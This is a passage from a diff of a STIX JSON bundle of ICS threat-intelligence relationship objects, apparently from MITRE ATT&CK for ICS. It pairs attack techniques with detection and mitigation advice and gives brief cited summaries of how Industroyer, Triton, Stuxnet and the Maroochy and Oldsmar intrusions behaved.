"2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:10:34.653Z", + "description": "Monitor for a loss of network communications, which may indicate this technique is 
being used.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1fe3e5fc-7dd6-4e14-b9da-edb1a2aae459", + "created": "2022-09-23T16:35:17.240Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:34:31.627Z", + "description": "Consult asset management systems which may help with the detection of computer systems or network devices that should not exist on a network.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b05a614b-033c-4578-b4f2-c63a9feee706", + "target_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--83c8c216-7ff7-4bd3-9db4-573469628d95", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Joe Slowik August 2019", + "description": "Joe Slowik 2019, August 15 CRASHOVERRIDE: Reassessing the 2016 Ukraine Electric Power Event as a Protection-Focused Attack Retrieved. 
2019/10/22 ", + "url": "https://dragos.com/wp-content/uploads/CRASHOVERRIDE.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-23T18:48:43.457Z", + "description": "The [Industroyer](https://attack.mitre.org/software/S0604) SPIROTEC DoS module places the victim device into firmware update mode. This is a legitimate use case under normal circumstances, but in this case is used the adversary to prevent the SPIROTEC from performing its designed protective functions. As a result the normal safeguards are disabled, leaving an unprotected link in the electric transmission. (Citation: Joe Slowik August 2019)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--21134484-2d59-46b7-b878-527121fff1e3", + "created": "2022-09-26T14:28:17.209Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T14:28:17.209Z", + "description": "Monitor asset logs for alarms or other information the adversary is unable to directly suppress. 
Relevant alarms include those from a loss of communications due to [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T0830) activity.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298", + "target_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c7aac6c9-da16-46e2-8cfa-dca07a0a7562", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.174Z", + "relationship_type": "mitigates", + "description": "Segment operational assets and their management devices based on their functional role within the process. Enabling more strict isolation to more critical control and operational information within the control environment. (Citation: Karen Scarfone; Paul Hoffman September 2009) (Citation: Keith Stouffer May 2015) (Citation: Department of Homeland Security September 2016) (Citation: Dwight Anderson 2014) \n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "external_references": [ + { + "source_name": "Karen Scarfone; Paul Hoffman September 2009", + "description": "Karen Scarfone; Paul Hoffman 2009, September Guidelines on Firewalls and Firewall Policy Retrieved. 
2020/09/25 ", + "url": "https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-41r1.pdf" + }, + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + }, + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + }, + { + "source_name": "Dwight Anderson 2014", + "description": "Dwight Anderson 2014 Protect Critical Infrastructure Systems With Whitelisting Retrieved. 2020/09/25 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/protect-critical-infrastructure-systems-whitelisting-35312" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--04882fef-2a6b-40d0-a101-da9c76a3572e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.128Z", + "relationship_type": "mitigates", + "description": "Restrict the use of untrusted or unknown libraries, such as remote or unknown DLLs.\n", + "source_ref": "course-of-action--2ab9fc6d-3cf6-4d7b-85f1-3ad6949233b3", + "target_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--268b9429-b1c6-4bc3-84cf-8512e8ef57a7", + "created": 
"2023-03-10T20:34:25.450Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Marshall Abrams July 2008", + "description": "Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 ", + "url": "https://www.mitre.org/sites/default/files/pdf/08_1145.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T22:05:00.124Z", + "description": "In the [Maroochy Water Breach](https://attack.mitre.org/campaigns/C0020), the adversary disabled alarms at four pumping stations, preventing notifications to the central computer.(Citation: Marshall Abrams July 2008)", + "relationship_type": "uses", + "source_ref": "campaign--70cab19e-1745-425e-b3db-c02cd5ff157a", + "target_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--76654cf3-5cfe-4bf4-b134-806fd75b1ddb", + "created": "2022-09-20T20:55:00.134Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Pinellas County Sheriffs Office February 2021", + "description": "Pinellas County Sheriffs Office 2021, February 8 Treatment Plant Intrusion Press Conference Retrieved. 
2021/10/08 ", + "url": "https://www.youtube.com/watch?v=MkXDSOgLQ6M" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-18T13:25:44.859Z", + "description": "During the [Oldsmar Treatment Plant Intrusion](https://attack.mitre.org/campaigns/C0009), the threat actors utilized the operator HMI interface through the graphical user interface. This action led to immediate operator detection as they were able to see the adversary making changes on their screen.(Citation: Pinellas County Sheriffs Office February 2021)", + "relationship_type": "uses", + "source_ref": "campaign--65281d3e-b03c-46b8-8cd8-716363ac3cb2", + "target_ref": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--13809e98-1d74-4c39-b882-9d523c76cbde", + "created": "2021-04-13T12:36:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Jos Wetzels January 2018", + "description": "Jos Wetzels 2018, January 16 Analyzing the TRITON industrial malware Retrieved. 2019/10/22 ", + "url": "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:24:07.929Z", + "description": "[Triton](https://attack.mitre.org/software/S1009)'s imain.bin payload takes commands from the TsHi.ExplReadRam(Ex), TsHi.ExplWriteRam(Ex) and TsHi.ExplExec functions to perform operations on controller memory and registers using syscalls written in PowerPC shellcode. 
(Citation: Jos Wetzels January 2018)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--41b87fd8-6e4d-4e53-a282-c85292fdaa22", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.160Z", + "relationship_type": "mitigates", + "description": "The encryption of firmware should be considered to prevent adversaries from identifying possible vulnerabilities within the firmware.\n", + "source_ref": "course-of-action--7f153c28-e5f1-4764-88fb-eea1d9b0ad4a", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--3f335e8f-68da-4b06-9d96-f371ddaf23e6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.236Z", + "relationship_type": "mitigates", + "description": "Ensure wireless networks require the authentication of all devices, and that all wireless devices also authenticate network infrastructure devices (i.e., mutual authentication). For defense-in-depth purposes, utilize VPNs or ensure that application-layer protocols also authenticate the system or device. 
Use protocols that provide strong authentication (e.g., IEEE 802.1X), and enforce basic protections, such as MAC filtering, when stronger cryptographic techniques are not available.\n", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--2877063e-1851-48d2-bcc6-bc1d2733157e", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--08302021-aacf-428f-a0ce-e1034d925fb0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.115Z", + "relationship_type": "mitigates", + "description": "Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization.\n", + "source_ref": "course-of-action--d48b79b2-076d-483e-949c-0d38aa347499", + "target_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--e0da1f92-82b1-4096-86c4-1aef58ca89fb", + "created": "2023-03-10T20:08:40.601Z", + "revoked": false, + "external_references": [ + { + "source_name": "Marshall Abrams July 2008", + "description": "Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 
2018/03/27 ", + "url": "https://www.mitre.org/sites/default/files/pdf/08_1145.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-10T20:08:40.601Z", + "description": "In the [Maroochy Water Breach](https://attack.mitre.org/campaigns/C0020), the adversary temporarily shut an investigator out of the network, preventing them from viewing the state of the system.(Citation: Marshall Abrams July 2008)", + "relationship_type": "uses", + "source_ref": "campaign--70cab19e-1745-425e-b3db-c02cd5ff157a", + "target_ref": "attack-pattern--56ddc820-6cfb-407f-850b-52c035d123ac", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--dbdd9a97-81df-40b8-b72d-ac67d121b8b3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.170Z", + "relationship_type": "mitigates", + "description": "Protocols used for control functions should provide authenticity through MAC functions or digital signatures. 
If not, utilize bump-in-the-wire devices or VPNs to enforce communication authenticity between devices that are not capable of supporting this (e.g., legacy controllers, RTUs).\n", + "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "target_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6b5fd6d8-ef70-4896-b1a4-7b6c29c3a0d4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.101Z", + "relationship_type": "mitigates", + "description": "All field controllers should restrict the modification of programs to only certain users (e.g., engineers, field technician), preferably through implementing a role-based access mechanism.\n", + "source_ref": "course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd", + "target_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f9aa3364-a1eb-4776-ae03-c39b250545a0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.185Z", + "relationship_type": "mitigates", + "description": "Review the integrity of project files to verify they have not been modified by adversary behavior. 
Verify a cryptographic hash for the file with a known trusted version, or look for other indicators of modification (e.g., timestamps).\n", + "source_ref": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697", + "target_ref": "attack-pattern--e72425f8-9ae6-41d3-bfdb-e1b865e60722", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6d1906b4-e815-4688-86f1-ce61d403f8c6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.186Z", + "relationship_type": "mitigates", + "description": "All remote services should require strong authentication before providing user access.\n", + "source_ref": "course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--52855d5d-e835-470f-a675-751c2779c861", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.140Z", + "relationship_type": "mitigates", + "description": "Utilize out-of-band communication to validate the integrity of data from the primary channel.\n", + "source_ref": "course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e", + "target_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": 
"1.0" + }, + { + "type": "relationship", + "id": "relationship--fe22637e-7187-4990-b24a-5dc851eec736", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:08:55.507Z", + "description": "Monitor for lack of operational process data which may help identify a loss of communications. This will not directly detect the technique’s execution, but instead may provide additional evidence that the technique has been used and may complement other detections.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95", + "target_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d1d98f8c-aea2-4f06-9b0d-c543ed42c6a4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.086Z", + "relationship_type": "mitigates", + "description": "Ensure that all SIS are segmented from operational networks to prevent them from being targeted by additional adversarial behavior.\n", + "source_ref": "course-of-action--da44255d-85c5-492c-baf3-ee823d44f848", + "target_ref": "attack-pattern--83ebd22f-b401-4d59-8219-2294172cf916", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": 
"relationship--2971151c-0e8a-4567-84dc-01cf5dd35005", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.199Z", + "relationship_type": "mitigates", + "description": "Digital signatures may be used to ensure application DLLs are authentic prior to execution.\n", + "source_ref": "course-of-action--71eb7dad-07eb-4bbc-9df0-ac57bf2fba4a", + "target_ref": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--214eb531-411c-4b90-9dbf-dc0183cbb919", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:34:19.403Z", + "description": "Monitor executed commands and arguments that may stop or disable services on a system to render those services unavailable to legitimate users.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--234da455-b795-4788-bc5d-22b4b58b2dc7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.212Z", + "relationship_type": "mitigates", + "description": "Protocols used for device management should authenticate 
all network messages to prevent unauthorized system changes.\n", + "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6b5d2643-b399-43aa-8ab1-7557a0446b07", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.147Z", + "relationship_type": "mitigates", + "description": "Only authorized personnel should be able to change settings for alarms.\n", + "source_ref": "course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd", + "target_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--06c663f8-fcf1-47eb-ab79-284e93eafa6b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.183Z", + "relationship_type": "mitigates", + "description": "Authenticate connections from software and devices to prevent unauthorized systems from accessing protected management functions.\n", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": 
"relationship--28afd84d-a53e-4b2f-9bee-133f7da6982a", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-20T21:10:43.996Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) copies the input area of an I/O image into data blocks with a one second interval between copies, forming a 21 second recording of the input area. The input area contains information being passed to the PLC from a peripheral. For example, the current state of a valve or the temperature of a device. 
(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--53a48c74-0025-45f4-b04a-baa853df8204", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9d5b9b9c-058f-4782-80aa-9d501442a03d", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:34:07.441Z", + "description": "Alterations to the service binary path or the service startup type changed to disabled may be suspicious.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ab60fe4a-5860-410a-8bca-2cdbea95e5f8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.080Z", + "relationship_type": "mitigates", + "description": "Use host-based allowlists to prevent devices from accepting connections from unauthorized systems. For example, allowlists can be used to ensure devices can only connect with master stations or known management/engineering workstations. 
(Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--4b57e41c-246f-44b3-b259-1811d5275e10", + "created": "2022-09-26T15:16:32.057Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:16:32.057Z", + "description": "Consult asset management systems to understand expected alarm settings.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b05a614b-033c-4578-b4f2-c63a9feee706", + "target_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a1454196-0d86-49f2-8dcb-61145a16b21e", + "created": "2022-09-26T20:36:04.428Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:33:05.248Z", + "description": "Monitor for files accessed on removable media, particularly those with executable content.", + "relationship_type": 
